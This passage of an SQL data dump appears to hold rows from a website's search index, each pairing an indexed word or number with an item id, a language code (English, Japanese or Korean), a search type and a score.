('7042024', 151, 'en', 'node_search', 2),
('7042024', 151, 'ja', 'node_search', 2),
('7042024', 152, 'en', 'node_search', 1),
('7042024', 152, 'ja', 'node_search', 1),
('7062024', 152, 'en', 'node_search', 1),
('7062024', 152, 'ja', 'node_search', 1),
('7082023', 28, 'en', 'node_search', 1),
('7082023', 28, 'ja', 'node_search', 1),
('7082023', 28, 'ko', 'node_search', 1),
('7082023', 29, 'en', 'node_search', 1),
('7082023', 29, 'ja', 'node_search', 1),
('7082023', 29, 'ko', 'node_search', 1),
('7082024', 153, 'en', 'node_search', 2),
('7082024', 153, 'ja', 'node_search', 2),
('7092023', 30, 'en', 'node_search', 1),
('7092023', 30, 'ja', 'node_search', 1),
('7092023', 30, 'ko', 'node_search', 1),
('7212023', 28, 'en', 'node_search', 1),
('7212023', 28, 'ja', 'node_search', 1),
('7212023', 28, 'ko', 'node_search', 1),
('7212023', 29, 'en', 'node_search', 1),
('7212023', 29, 'ja', 'node_search', 1),
('7212023', 29, 'ko', 'node_search', 1),
('7212023', 30, 'en', 'node_search', 1),
('7212023', 30, 'ja', 'node_search', 1),
('7212023', 30, 'ko', 'node_search', 1),
('7212023', 31, 'en', 'node_search', 1),
('7262023', 31, 'en', 'node_search', 1),
('73', 3, 'en', 'node_search', 47),
('73', 3, 'ja', 'node_search', 46.608),
('73', 3, 'ko', 'node_search', 47),
('73', 19, 'en', 'node_search', 3),
('73', 19, 'ja', 'node_search', 3),
('73', 19, 'ko', 'node_search', 3),
('73', 24, 'en', 'node_search', 1),
('73', 24, 'ja', 'node_search', 1),
('735', 24, 'ko', 'node_search', 1),
('74', 3, 'en', 'node_search', 2),
('74', 3, 'ja', 'node_search', 1.21357),
('74', 3, 'ko', 'node_search', 2),
('775556677', 11, 'en', 'node_search', 1),
('775556677', 11, 'ja', 'node_search', 1),
('775556677', 11, 'ko', 'node_search', 1),
('775556677', 62, 'en', 'node_search', 0.78951),
('775556677', 62, 'ja', 'node_search', 0.471741),
('8', 5, 'en', 'node_search', 2),
('8', 5, 'ja', 'node_search', 2),
('8', 5, 'ko', 'node_search', 2),
('8', 29, 'ja', 'node_search', 1),
('8', 31, 'en', 'node_search', 0.927431),
('8', 69, 'ja', 'node_search', 1),
('8', 126, 'ja', 'node_search', 1),
('8', 163, 'ja', 'node_search', 1.58426),
('8172023', 5, 'ja', 'node_search', 1),
('8252023', 62, 'en', 'node_search', 2),
('8252023', 62, 'ja', 'node_search', 2),
('8252026', 205, 'en', 'node_search', 1),
('8252026', 205, 'ja', 'node_search', 1),
('8262026', 204, 'en', 'node_search', 2),
('8262026', 204, 'ja', 'node_search', 2),
('8262026', 205, 'en', 'node_search', 1),
('8262026', 205, 'ja', 'node_search', 1),
('8272026', 206, 'ja', 'node_search', 1),
('8282026', 206, 'ja', 'node_search', 1),
('839330', 62, 'en', 'node_search', 0.800068),
('839330', 62, 'ja', 'node_search', 0.474499),
('8393300', 11, 'en', 'node_search', 1),
('8393300', 11, 'ja', 'node_search', 1),
('8393300', 11, 'ko', 'node_search', 1),
('8393344', 11, 'en', 'node_search', 1),
('8393344', 11, 'ja', 'node_search', 1),
('8393344', 11, 'ko', 'node_search', 1),
('8393344', 62, 'en', 'node_search', 0.797402),
('8393344', 62, 'ja', 'node_search', 0.473576),
('8393393', 11, 'en', 'node_search', 1),
('8393393', 11, 'ja', 'node_search', 1),
('8393393', 11, 'ko', 'node_search', 1),
('8393393', 62, 'en', 'node_search', 0.794753),
('8393393', 62, 'ja', 'node_search', 0.472657),
('872023', 29, 'en', 'node_search', 1),
('872023', 29, 'ko', 'node_search', 1),
('9', 11, 'en', 'node_search', 1),
('9', 11, 'ja', 'node_search', 1),
('9', 11, 'ko', 'node_search', 1),
('9', 29, 'en', 'help_search', 1),
('9', 29, 'ja', 'help_search', 1),
('9', 29, 'ko', 'help_search', 1),
('9', 62, 'en', 'node_search', 0.792123),
('9', 62, 'ja', 'node_search', 1.67222),
('9', 69, 'ja', 'node_search', 1),
('9', 126, 'en', 'node_search', 1),
('9', 126, 'ja', 'node_search', 1),
('9', 157, 'ja', 'node_search', 28.8335),
('9', 173, 'ja', 'node_search', 31.0475),
('900', 31, 'en', 'node_search', 0.819249),
('900', 68, 'en', 'node_search', 1),
('900', 68, 'ja', 'node_search', 1),
('900', 69, 'en', 'node_search', 1),
('900', 69, 'ja', 'node_search', 1),
('900', 72, 'en', 'node_search', 1),
('900', 72, 'ja', 'node_search', 1),
('900', 73, 'en', 'node_search', 1),
('900', 73, 'ja', 'node_search', 1),
('900', 74, 'en', 'node_search', 1),
('900', 74, 'ja', 'node_search', 1),
('900', 75, 'en', 'node_search', 1),
('900', 75, 'ja', 'node_search', 1),
('900', 76, 'en', 'node_search', 1),
('900', 76, 'ja', 'node_search', 1),
('900', 77, 'en', 'node_search', 1),
('900', 77, 'ja', 'node_search', 1),
('900', 78, 'en', 'node_search', 1),
('900', 78, 'ja', 'node_search', 1),
('900', 79, 'en', 'node_search', 1),
('900', 80, 'en', 'node_search', 1),
('900', 80, 'ja', 'node_search', 1),
('900', 81, 'en', 'node_search', 1),
('900', 81, 'ja', 'node_search', 1),
('900', 82, 'en', 'node_search', 1),
('900', 82, 'ja', 'node_search', 1),
('900', 85, 'en', 'node_search', 1),
('900', 85, 'ja', 'node_search', 1),
('900', 87, 'en', 'node_search', 1),
('900', 87, 'ja', 'node_search', 1),
('900', 95, 'en', 'node_search', 1),
('900', 95, 'ja', 'node_search', 1),
('900', 96, 'en', 'node_search', 1),
('900', 96, 'ja', 'node_search', 1),
('900', 97, 'en', 'node_search', 1),
('900', 97, 'ja', 'node_search', 1),
('900', 98, 'en', 'node_search', 1),
('900', 98, 'ja', 'node_search', 1),
('900', 99, 'en', 'node_search', 1),
('900', 99, 'ja', 'node_search', 1),
('900', 100, 'en', 'node_search', 1),
('900', 100, 'ja', 'node_search', 1),
('900', 101, 'en', 'node_search', 1),
('900', 101, 'ja', 'node_search', 1),
('900', 102, 'en', 'node_search', 1),
('900', 102, 'ja', 'node_search', 1),
('900', 103, 'en', 'node_search', 1),
('900', 103, 'ja', 'node_search', 1),
('900', 104, 'en', 'node_search', 1),
('900', 104, 'ja', 'node_search', 1),
('900', 105, 'en', 'node_search', 1),
('900', 105, 'ja', 'node_search', 1),
('900', 106, 'en', 'node_search', 1),
('900', 106, 'ja', 'node_search', 1),
('900', 107, 'en', 'node_search', 1),
('900', 107, 'ja', 'node_search', 1),
('900', 108, 'en', 'node_search', 1),
('900', 108, 'ja', 'node_search', 1),
('900', 109, 'en', 'node_search', 1),
('900', 109, 'ja', 'node_search', 1),
('900', 110, 'en', 'node_search', 1),
('900', 110, 'ja', 'node_search', 1),
('900', 111, 'en', 'node_search', 1),
('900', 111, 'ja', 'node_search', 1),
('900', 112, 'en', 'node_search', 1),
('900', 112, 'ja', 'node_search', 1),
('900', 113, 'en', 'node_search', 1),
('900', 113, 'ja', 'node_search', 1),
('900', 114, 'en', 'node_search', 1),
('900', 114, 'ja', 'node_search', 1),
('900', 115, 'en', 'node_search', 1),
('900', 115, 'ja', 'node_search', 1),
('900', 116, 'en', 'node_search', 1),
('900', 116, 'ja', 'node_search', 1),
('900', 117, 'en', 'node_search', 1),
('900', 117, 'ja', 'node_search', 1),
('900', 118, 'en', 'node_search', 1),
('900', 118, 'ja', 'node_search', 1),
('900', 119, 'en', 'node_search', 1),
('900', 119, 'ja', 'node_search', 1),
('900', 120, 'en', 'node_search', 1),
('900', 120, 'ja', 'node_search', 1),
('900', 121, 'en', 'node_search', 1),
('900', 121, 'ja', 'node_search', 1),
('900', 122, 'en', 'node_search', 1),
('900', 122, 'ja', 'node_search', 1),
('900', 123, 'en', 'node_search', 1),
('900', 123, 'ja', 'node_search', 1),
('900', 124, 'en', 'node_search', 1),
('900', 124, 'ja', 'node_search', 1),
('900', 125, 'en', 'node_search', 1),
('900', 125, 'ja', 'node_search', 1),
('900', 126, 'en', 'node_search', 1),
('900', 126, 'ja', 'node_search', 1),
('900', 127, 'en', 'node_search', 1),
('900', 127, 'ja', 'node_search', 1),
('900', 128, 'en', 'node_search', 1),
('900', 128, 'ja', 'node_search', 1),
('900', 129, 'en', 'node_search', 1),
('900', 129, 'ja', 'node_search', 1),
('900', 130, 'en', 'node_search', 1),
('900', 130, 'ja', 'node_search', 1),
('900', 131, 'en', 'node_search', 1),
('900', 131, 'ja', 'node_search', 1),
('900', 132, 'en', 'node_search', 1),
('900', 132, 'ja', 'node_search', 1),
('900', 133, 'en', 'node_search', 1),
('900', 133, 'ja', 'node_search', 1),
('900', 134, 'en', 'node_search', 1),
('900', 134, 'ja', 'node_search', 1),
('900', 135, 'en', 'node_search', 1),
('900', 135, 'ja', 'node_search', 1),
('900', 136, 'en', 'node_search', 1),
('900', 136, 'ja', 'node_search', 1),
('900', 137, 'en', 'node_search', 1),
('900', 137, 'ja', 'node_search', 1),
('900', 138, 'en', 'node_search', 1),
('900', 138, 'ja', 'node_search', 1),
('900', 139, 'en', 'node_search', 1),
('900', 139, 'ja', 'node_search', 1),
('900', 140, 'en', 'node_search', 1),
('900', 140, 'ja', 'node_search', 1),
('900', 141, 'en', 'node_search', 1),
('900', 141, 'ja', 'node_search', 1),
('900', 142, 'en', 'node_search', 1),
('900', 142, 'ja', 'node_search', 1),
('900', 143, 'en', 'node_search', 1),
('900', 143, 'ja', 'node_search', 1),
('900', 144, 'en', 'node_search', 1),
('900', 144, 'ja', 'node_search', 1),
('900', 146, 'en', 'node_search', 1),
('900', 146, 'ja', 'node_search', 1),
('900', 147, 'en', 'node_search', 1),
('900', 147, 'ja', 'node_search', 1),
('900', 148, 'en', 'node_search', 1),
('900', 148, 'ja', 'node_search', 1),
('900', 149, 'en', 'node_search', 1),
('900', 150, 'en', 'node_search', 1),
('900', 150, 'ja', 'node_search', 1),
('900', 151, 'en', 'node_search', 1),
('900', 151, 'ja', 'node_search', 1),
('900', 153, 'en', 'node_search', 1),
('900', 153, 'ja', 'node_search', 1),
('900', 156, 'en', 'node_search', 1),
('900', 156, 'ja', 'node_search', 1),
('901', 195, 'en', 'node_search', 1),
('901', 195, 'ja', 'node_search', 1),
('902', 94, 'en', 'node_search', 1),
('902', 161, 'en', 'node_search', 1),
('902', 161, 'ja', 'node_search', 1),
('902', 189, 'en', 'node_search', 1),
('902', 189, 'ja', 'node_search', 1),
('904', 196, 'en', 'node_search', 1),
('904', 196, 'ja', 'node_search', 1),
('907', 166, 'en', 'node_search', 1),
('907', 166, 'ja', 'node_search', 1),
('908', 83, 'en', 'node_search', 1),
('908', 83, 'ja', 'node_search', 1),
('908', 157, 'en', 'node_search', 1),
('908', 157, 'ja', 'node_search', 1),
('909', 19, 'en', 'node_search', 1),
('909', 19, 'ja', 'node_search', 1),
('909', 19, 'ko', 'node_search', 1),
('909', 20, 'en', 'node_search', 1),
('909', 20, 'ja', 'node_search', 1),
('909', 20, 'ko', 'node_search', 1),
('911', 173, 'en', 'node_search', 1),
('911', 173, 'ja', 'node_search', 1),
('912', 167, 'en', 'node_search', 1),
('912', 167, 'ja', 'node_search', 1),
('915', 168, 'en', 'node_search', 1),
('915', 168, 'ja', 'node_search', 1),
('915', 174, 'en', 'node_search', 1),
('915', 174, 'ja', 'node_search', 1),
('917', 197, 'en', 'node_search', 1),
('917', 197, 'ja', 'node_search', 1),
('920', 175, 'en', 'node_search', 1),
('920', 175, 'ja', 'node_search', 1),
('921', 169, 'en', 'node_search', 1),
('921', 169, 'ja', 'node_search', 1),
('923', 86, 'en', 'node_search', 1),
('923', 86, 'ja', 'node_search', 1),
('923', 179, 'en', 'node_search', 1),
('923', 179, 'ja', 'node_search', 1),
('923', 198, 'en', 'node_search', 1),
('923', 198, 'ja', 'node_search', 1),
('925', 180, 'en', 'node_search', 1),
('925', 180, 'ja', 'node_search', 1),
('928', 187, 'en', 'node_search', 1),
('928', 187, 'ja', 'node_search', 1),
('929', 28, 'en', 'node_search', 1),
('929', 28, 'ja', 'node_search', 1),
('929', 28, 'ko', 'node_search', 1),
('929', 162, 'en', 'node_search', 1),
('929', 162, 'ja', 'node_search', 1),
('929', 176, 'en', 'node_search', 1),
('929', 176, 'ja', 'node_search', 1),
('929', 181, 'en', 'node_search', 1),
('929', 181, 'ja', 'node_search', 1),
('929', 199, 'en', 'node_search', 1),
('929', 199, 'ja', 'node_search', 1),
('930', 88, 'en', 'node_search', 1),
('930', 88, 'ja', 'node_search', 1),
('931', 17, 'en', 'node_search', 1),
('931', 17, 'ja', 'node_search', 1),
('931', 17, 'ko', 'node_search', 1),
('932', 182, 'en', 'node_search', 1),
('932', 182, 'ja', 'node_search', 1),
('932', 200, 'ja', 'node_search', 1),
('934', 183, 'en', 'node_search', 1),
('934', 183, 'ja', 'node_search', 1),
('936', 154, 'en', 'node_search', 1),
('936', 154, 'ja', 'node_search', 1),
('936', 163, 'en', 'node_search', 1),
('936', 163, 'ja', 'node_search', 1),
('937', 89, 'en', 'node_search', 1),
('937', 89, 'ja', 'node_search', 1),
('938', 184, 'en', 'node_search', 1),
('938', 184, 'ja', 'node_search', 1),
('940', 190, 'en', 'node_search', 1),
('941', 177, 'en', 'node_search', 1),
('941', 177, 'ja', 'node_search', 1),
('942', 91, 'en', 'node_search', 1),
('942', 91, 'ja', 'node_search', 1),
('942', 191, 'en', 'node_search', 1),
('942', 191, 'ja', 'node_search', 1),
('942024', 69, 'en', 'node_search', 27),
('942024', 69, 'ja', 'node_search', 27),
('943', 62, 'en', 'node_search', 1),
('943', 62, 'ja', 'node_search', 1),
('943', 170, 'en', 'node_search', 1),
('943', 170, 'ja', 'node_search', 1),
('943', 185, 'en', 'node_search', 1),
('943', 185, 'ja', 'node_search', 1),
('945', 192, 'en', 'node_search', 1),
('945', 192, 'ja', 'node_search', 1),
('946', 186, 'en', 'node_search', 1),
('946', 186, 'ja', 'node_search', 1),
('948', 92, 'en', 'node_search', 1),
('948', 92, 'ja', 'node_search', 1),
('948', 171, 'en', 'node_search', 1),
('948', 171, 'ja', 'node_search', 1),
('948', 193, 'en', 'node_search', 1),
('948', 193, 'ja', 'node_search', 1),
('949', 18, 'en', 'node_search', 1),
('949', 18, 'ja', 'node_search', 1),
('949', 18, 'ko', 'node_search', 1),
('95015742', 4, 'en', 'node_search', 1),
('95015742', 4, 'ja', 'node_search', 1),
('95015742', 4, 'ko', 'node_search', 1),
('95015742', 10, 'en', 'node_search', 1),
('95015742', 10, 'ja', 'node_search', 1),
('95015742', 10, 'ko', 'node_search', 1),
('95015742', 17, 'en', 'node_search', 1),
('95015742', 17, 'ja', 'node_search', 1),
('95015742', 17, 'ko', 'node_search', 1),
('95015742', 18, 'en', 'node_search', 1),
('95015742', 18, 'ja', 'node_search', 0.869951),
('95015742', 18, 'ko', 'node_search', 1),
('95015742', 19, 'en', 'node_search', 1),
('95015742', 19, 'ja', 'node_search', 1),
('95015742', 19, 'ko', 'node_search', 1),
('95015742', 28, 'en', 'node_search', 1),
('95015742', 28, 'ko', 'node_search', 1),
('95015742', 30, 'en', 'node_search', 1),
('95015742', 30, 'ko', 'node_search', 1),
('95015742', 31, 'en', 'node_search', 0.866793),
('953', 178, 'en', 'node_search', 1),
('953', 178, 'ja', 'node_search', 1),
('953', 188, 'en', 'node_search', 1),
('953', 188, 'ja', 'node_search', 1),
('955', 31, 'en', 'node_search', 1),
('95556677', 5, 'en', 'node_search', 1),
('95556677', 5, 'ja', 'node_search', 0.72066),
('95556677', 5, 'ko', 'node_search', 1),
('95556677', 17, 'en', 'node_search', 1),
('95556677', 17, 'ja', 'node_search', 1),
('95556677', 17, 'ko', 'node_search', 1),
('956', 93, 'en', 'node_search', 1),
('956', 93, 'ja', 'node_search', 1),
('956', 165, 'en', 'node_search', 1),
('956', 165, 'ja', 'node_search', 1),
('956', 194, 'en', 'node_search', 1),
('956', 194, 'ja', 'node_search', 1),
('959', 11, 'en', 'node_search', 1),
('959', 11, 'ja', 'node_search', 1),
('959', 11, 'ko', 'node_search', 1),
('959', 30, 'en', 'node_search', 1),
('959', 30, 'ja', 'node_search', 1),
('959', 30, 'ko', 'node_search', 1),
('959', 62, 'en', 'node_search', 0.784336),
('959', 62, 'ja', 'node_search', 0.469921),
('959', 155, 'en', 'node_search', 1),
('959', 155, 'ja', 'node_search', 1),
('959', 160, 'en', 'node_search', 1),
('959', 160, 'ja', 'node_search', 1),
('9752510732', 18, 'en', 'node_search', 1),
('9752510732', 18, 'ja', 'node_search', 0.863659),
('9752510732', 18, 'ko', 'node_search', 1),
('9775556677', 4, 'en', 'node_search', 1),
('9775556677', 4, 'ja', 'node_search', 1),
('9775556677', 4, 'ko', 'node_search', 1),
('9775556677', 10, 'en', 'node_search', 1),
('9775556677', 10, 'ja', 'node_search', 1),
('9775556677', 10, 'ko', 'node_search', 1),
('9775556677', 18, 'en', 'node_search', 1),
('9775556677', 18, 'ja', 'node_search', 0.876337),
('9775556677', 18, 'ko', 'node_search', 1),
('9775556677', 19, 'en', 'node_search', 1),
('9775556677', 19, 'ja', 'node_search', 1),
('9775556677', 19, 'ko', 'node_search', 1),
('9775556677', 28, 'en', 'node_search', 1),
('9775556677', 28, 'ko', 'node_search', 1),
('9775556677', 30, 'en', 'node_search', 1),
('9775556677', 30, 'ko', 'node_search', 1),
('9775556677', 31, 'en', 'node_search', 0.869951),
('9775556677018393300018393344', 5, 'en', 'node_search', 1),
('9775556677018393300018393344', 5, 'ja', 'node_search', 0.716357),
('9775556677018393300018393344', 5, 'ko', 'node_search', 1),
('9775556677018393300018393344', 17, 'en', 'node_search', 1),
('9775556677018393300018393344', 17, 'ja', 'node_search', 1),
('9775556677018393300018393344', 17, 'ko', 'node_search', 1),
('97755566770995094749109501574209965104911', 30, 'ja', 'node_search', 0.827757),
('97755566770995094749109501574209965104911018393300', 28, 'ja', 'node_search', 1),
('9950947491', 4, 'en', 'node_search', 1),
('9950947491', 4, 'ja', 'node_search', 1),
('9950947491', 4, 'ko', 'node_search', 1),
('9950947491', 10, 'en', 'node_search', 1),
('9950947491', 10, 'ja', 'node_search', 1),
('9950947491', 10, 'ko', 'node_search', 1),
('9950947491', 18, 'en', 'node_search', 1),
('9950947491', 18, 'ja', 'node_search', 0.873132),
('9950947491', 18, 'ko', 'node_search', 1),
('9950947491', 19, 'en', 'node_search', 1),
('9950947491', 19, 'ja', 'node_search', 1),
('9950947491', 19, 'ko', 'node_search', 1),
('9950947491', 28, 'en', 'node_search', 1),
('9950947491', 28, 'ko', 'node_search', 1),
('9950947491', 30, 'en', 'node_search', 1),
('9950947491', 30, 'ko', 'node_search', 1),
('9950947491', 31, 'en', 'node_search', 0.863659),
('9950947491095015742', 5, 'en', 'node_search', 1),
('9950947491095015742', 5, 'ja', 'node_search', 0.718502),
('9950947491095015742', 5, 'ko', 'node_search', 1),
('9965104911', 28, 'en', 'node_search', 1),
('9965104911', 28, 'ko', 'node_search', 1),
('9965104911', 30, 'en', 'node_search', 1),
('9965104911', 30, 'ko', 'node_search', 1),
('9971286882', 18, 'en', 'node_search', 1),
('9971286882', 18, 'ja', 'node_search', 0.866793),
('9971286882', 18, 'ko', 'node_search', 1),
('9must', 31, 'en', 'node_search', 0.913226),
('a32', 11, 'en', 'node_search', 1),
('a32', 11, 'ja', 'node_search', 1),
('abbreviation', 65, 'en', 'help_search', 1),
('abbreviation', 65, 'ja', 'help_search', 1),
('abbreviation', 65, 'ko', 'help_search', 1),
('abilities', 23, 'en', 'node_search', 0.822065),
('ability', 7, 'en', 'node_search', 29),
('ability', 7, 'ko', 'node_search', 29),
('ability', 27, 'en', 'node_search', 0.808176),
('ability', 30, 'en', 'help_search', 1),
('ability', 30, 'ja', 'help_search', 1),
('ability', 30, 'ko', 'help_search', 1),
('ability', 36, 'en', 'help_search', 2),
('ability', 36, 'ja', 'help_search', 2),
('ability', 36, 'ko', 'help_search', 2),
('ability', 37, 'en', 'help_search', 0.857458),
('ability', 37, 'ja', 'help_search', 0.857458),
('ability', 37, 'ko', 'help_search', 0.857458),
('ability', 39, 'en', 'help_search', 1),
('ability', 39, 'ja', 'help_search', 1),
('ability', 39, 'ko', 'help_search', 1),
('ability', 41, 'en', 'help_search', 1),
('ability', 41, 'ja', 'help_search', 1),
('ability', 41, 'ko', 'help_search', 1),
('ability', 68, 'en', 'help_search', 1),
('ability', 68, 'ja', 'help_search', 1),
('ability', 68, 'ko', 'help_search', 1),
('able', 7, 'en', 'help_search', 1),
('able', 7, 'ja', 'help_search', 1),
('able', 7, 'ko', 'help_search', 1),
('able', 23, 'en', 'node_search', 0.833529),
('able', 30, 'en', 'node_search', 2),
('able', 46, 'en', 'help_search', 0.961087),
('able', 46, 'ja', 'help_search', 0.961087),
('able', 46, 'ko', 'help_search', 0.961087),
('able', 73, 'en', 'help_search', 2),
('able', 73, 'ja', 'help_search', 2),
('able', 73, 'ko', 'help_search', 2),
('about', 1, 'en', 'node_search', 28),
('about', 1, 'ko', 'node_search', 27),
('about', 7, 'en', 'help_search', 1),
('about', 7, 'ja', 'help_search', 1),
('about', 7, 'ko', 'help_search', 1),
('about', 8, 'en', 'help_search', 2),
('about', 8, 'ja', 'help_search', 2),
('about', 8, 'ko', 'help_search', 2),
('about', 9, 'en', 'help_search', 2),
('about', 9, 'ja', 'help_search', 2),
('about', 9, 'ko', 'help_search', 2),
('about', 11, 'en', 'help_search', 1.90974),
('about', 11, 'ja', 'help_search', 1.90974),
('about', 11, 'ko', 'help_search', 1.90974),
('about', 12, 'en', 'help_search', 1),
('about', 12, 'ja', 'help_search', 1),
('about', 12, 'ko', 'help_search', 1),
('about', 13, 'en', 'help_search', 1),
('about', 13, 'ja', 'help_search', 1),
('about', 13, 'ko', 'help_search', 1),
('about', 14, 'en', 'help_search', 1),
('about', 14, 'ja', 'help_search', 1),
('about', 14, 'ko', 'help_search', 1),
('about', 15, 'en', 'help_search', 1),
('about', 15, 'ja', 'help_search', 1),
('about', 15, 'ko', 'help_search', 1),
('about', 16, 'en', 'help_search', 1),
('about', 16, 'ja', 'help_search', 1),
('about', 16, 'ko', 'help_search', 1),
('about', 23, 'en', 'help_search', 1.98087),
('about', 23, 'en', 'node_search', 0.860547),
('about', 23, 'ja', 'help_search', 1.98087),
('about', 23, 'ko', 'help_search', 1.98087),
('about', 31, 'en', 'node_search', 0.873132),
('about', 31, 'ja', 'help_search', 1),
('about', 38, 'en', 'help_search', 1),
('about', 38, 'ja', 'help_search', 1),
('about', 38, 'ko', 'help_search', 1),
('about', 41, 'en', 'help_search', 2),
('about', 41, 'ja', 'help_search', 2),
('about', 41, 'ko', 'help_search', 2),
('about', 43, 'en', 'help_search', 0.902857),
('about', 43, 'ja', 'help_search', 0.902857),
('about', 43, 'ko', 'help_search', 0.902857),
('about', 45, 'en', 'help_search', 1),
('about', 45, 'ja', 'help_search', 1),
('about', 45, 'ko', 'help_search', 1),
('about', 59, 'en', 'help_search', 1),
('about', 59, 'ja', 'help_search', 1),
('about', 59, 'ko', 'help_search', 1),
('about', 60, 'en', 'help_search', 1),
('about', 60, 'ja', 'help_search', 1),
('about', 60, 'ko', 'help_search', 1),
('about', 61, 'en', 'help_search', 1),
('about', 61, 'ja', 'help_search', 1),
('about', 61, 'ko', 'help_search', 1),
('about', 62, 'en', 'help_search', 1),
('about', 62, 'ja', 'help_search', 1),
('about', 62, 'ko', 'help_search', 1),
('about', 63, 'en', 'help_search', 1),
('about', 63, 'ja', 'help_search', 1),
('about', 63, 'ko', 'help_search', 1),
('about', 64, 'en', 'help_search', 1),
('about', 64, 'ja', 'help_search', 1),
('about', 64, 'ko', 'help_search', 1),
('about', 65, 'en', 'help_search', 9),
('about', 65, 'ja', 'help_search', 9),
('about', 65, 'ko', 'help_search', 9),
('about', 67, 'en', 'help_search', 1),
('about', 67, 'ja', 'help_search', 1),
('about', 67, 'ko', 'help_search', 1),
('about', 68, 'en', 'help_search', 0.839384),
('about', 68, 'ja', 'help_search', 0.839384),
('about', 68, 'ko', 'help_search', 0.839384),
('about', 76, 'en', 'help_search', 1),
('about', 76, 'ja', 'help_search', 1),
('about', 76, 'ko', 'help_search', 1),
('about', 79, 'en', 'help_search', 2),
('about', 79, 'ja', 'help_search', 2),
('about', 79, 'ko', 'help_search', 2),
('about', 89, 'en', 'help_search', 1),
('about', 89, 'ja', 'help_search', 1),
('about', 89, 'ko', 'help_search', 1),
('about', 93, 'en', 'help_search', 1.68557),
('about', 93, 'ja', 'help_search', 1.68557),
('about', 93, 'ko', 'help_search', 1.68557),
('about', 98, 'en', 'node_search', 1),
('about', 150, 'en', 'node_search', 46),
('about', 150, 'ja', 'node_search', 27),
('aboutus', 63, 'en', 'help_search', 5),
('aboutus', 63, 'ja', 'help_search', 5),
('aboutus', 63, 'ko', 'help_search', 5),
('above', 6, 'en', 'help_search', 1),
('above', 6, 'ja', 'help_search', 1),
('above', 6, 'ko', 'help_search', 1),
('above', 11, 'en', 'help_search', 0.869951),
('above', 11, 'ja', 'help_search', 0.869951),
('above', 11, 'ko', 'help_search', 0.869951),
('above', 24, 'en', 'node_search', 1.86679),
('above', 27, 'en', 'node_search', 1),
('above', 42, 'en', 'help_search', 1),
('above', 42, 'ja', 'help_search', 1),
('above', 42, 'ko', 'help_search', 1),
('above', 43, 'en', 'help_search', 0.879565),
('above', 43, 'ja', 'help_search', 0.879565),
('above', 43, 'ko', 'help_search', 0.879565),
('above', 54, 'en', 'help_search', 1),
('above', 54, 'ja', 'help_search', 1),
('above', 54, 'ko', 'help_search', 1),
('above', 163, 'en', 'node_search', 1.9496),
('abroad', 26, 'en', 'node_search', 1),
('abroad', 154, 'en', 'node_search', 1),
('abroad', 165, 'en', 'node_search', 1),
('abroad', 174, 'en', 'node_search', 1),
('abroad', 175, 'en', 'node_search', 1),
('abroad', 180, 'en', 'node_search', 1),
('abroad', 191, 'en', 'node_search', 1),
('abroad', 198, 'en', 'node_search', 1),
('abu', 18, 'en', 'node_search', 28),
('abu', 18, 'ko', 'node_search', 28),
('abundant', 66, 'en', 'node_search', 1),
('academic', 182, 'en', 'node_search', 4),
('accentscurrently', 138, 'en', 'node_search', 1),
('access', 10, 'en', 'help_search', 4),
('access', 10, 'ja', 'help_search', 4),
('access', 10, 'ko', 'help_search', 4),
('access', 22, 'en', 'help_search', 2),
('access', 22, 'ja', 'help_search', 2),
('access', 22, 'ko', 'help_search', 2),
('access', 28, 'en', 'help_search', 0.873132),
('access', 28, 'ja', 'help_search', 0.873132),
('access', 28, 'ko', 'help_search', 0.873132),
('access', 30, 'en', 'help_search', 0.705825),
('access', 30, 'ja', 'help_search', 0.705825),
('access', 30, 'ko', 'help_search', 0.705825),
('access', 59, 'en', 'help_search', 8),
('access', 59, 'ja', 'help_search', 8),
('access', 59, 'ko', 'help_search', 8),
('access', 61, 'en', 'help_search', 8),
('access', 61, 'ja', 'help_search', 8),
('access', 61, 'ko', 'help_search', 8),
('access', 68, 'en', 'help_search', 1.7974),
('access', 68, 'ja', 'help_search', 1.7974),
('access', 68, 'ko', 'help_search', 1.7974),
('access', 69, 'en', 'help_search', 1),
('access', 69, 'ja', 'help_search', 1),
('access', 69, 'ko', 'help_search', 1),
('access', 81, 'en', 'help_search', 8),
('access', 81, 'ja', 'help_search', 8),
('access', 81, 'ko', 'help_search', 8),
('access', 89, 'en', 'help_search', 4),
('access', 89, 'ja', 'help_search', 4),
('access', 89, 'ko', 'help_search', 4),
('access', 93, 'en', 'help_search', 4),
('access', 93, 'ja', 'help_search', 4),
('access', 93, 'ko', 'help_search', 4),
('accessibility', 42, 'en', 'help_search', 46),
('accessibility', 42, 'ja', 'help_search', 46),
('accessibility', 42, 'ko', 'help_search', 46),
('accessibility', 43, 'en', 'help_search', 2),
('accessibility', 43, 'ja', 'help_search', 2),
('accessibility', 43, 'ko', 'help_search', 2),
('accessible', 42, 'en', 'help_search', 2),
('accessible', 42, 'ja', 'help_search', 2),
('accessible', 42, 'ko', 'help_search', 2),
('accessible', 73, 'en', 'help_search', 1),
('accessible', 73, 'ja', 'help_search', 1),
('accessible', 73, 'ko', 'help_search', 1),
('accessing', 84, 'en', 'help_search', 2),
('accessing', 84, 'ja', 'help_search', 2),
('accessing', 84, 'ko', 'help_search', 2),
('accompanying', 77, 'en', 'node_search', 4),
('accompanying', 162, 'en', 'node_search', 1),
('accomplish', 46, 'en', 'help_search', 1),
('accomplish', 46, 'ja', 'help_search', 1),
('accomplish', 46, 'ko', 'help_search', 1),
('accomplishment', 166, 'en', 'node_search', 1),
('accomplishment', 168, 'en', 'node_search', 1),
('accomplishment', 170, 'en', 'node_search', 1),
('accomplishment', 180, 'en', 'node_search', 1),
('accomplishment', 182, 'en', 'node_search', 1),
('accomplishment', 185, 'en', 'node_search', 1),
('accomplishment', 186, 'en', 'node_search', 1),
('accomplishment', 187, 'en', 'node_search', 1),
('accomplishment', 189, 'en', 'node_search', 1),
('accomplishment', 190, 'en', 'node_search', 1),
('accomplishment', 192, 'en', 'node_search', 1),
('accomplishment', 194, 'en', 'node_search', 1),
('accomplishment', 195, 'en', 'node_search', 1),
('accomplishment', 196, 'en', 'node_search', 1),
('accomplishment', 198, 'en', 'node_search', 1),
('accomplishment', 199, 'en', 'node_search', 1),
('accordance', 24, 'en', 'node_search', 0.860547),
('accordance', 26, 'en', 'node_search', 1),
('according', 26, 'en', 'node_search', 1),
('according', 27, 'en', 'node_search', 1),
('account', 18, 'en', 'help_search', 4),
('account', 18, 'ja', 'help_search', 4),
('account', 18, 'ko', 'help_search', 4),
('account', 20, 'en', 'help_search', 1),
('account', 20, 'ja', 'help_search', 1),
('account', 20, 'ko', 'help_search', 1),
('account', 82, 'en', 'help_search', 36),
('account', 82, 'ja', 'help_search', 36),
('account', 82, 'ko', 'help_search', 36),
